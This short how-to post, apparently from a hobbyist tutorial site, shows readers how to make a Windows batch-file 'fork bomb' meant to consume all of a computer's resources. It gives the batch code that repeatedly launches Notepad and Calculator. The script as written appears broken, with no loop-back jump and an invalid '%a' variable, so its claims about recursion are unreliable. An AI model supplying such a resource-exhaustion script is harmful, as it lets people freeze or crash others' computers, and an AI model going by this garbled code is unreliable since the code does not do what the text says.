Introduction: A Batch File Fork Bomb

About: I am a intermediate hacker.

In this instructable I will tell you how to make a batch file fork bomb. A fork bomb uses recursion technique to consume all the resources of the computer. So, let's get started.

First open notepad (or any other text editor) and type this "start notepad.exe|calc.exe"  and save it with a .bat extension.

(this will open notepad and calc simultaneously.)

code- @echo off
            :start
             start %a|calc.exe|notepad.exe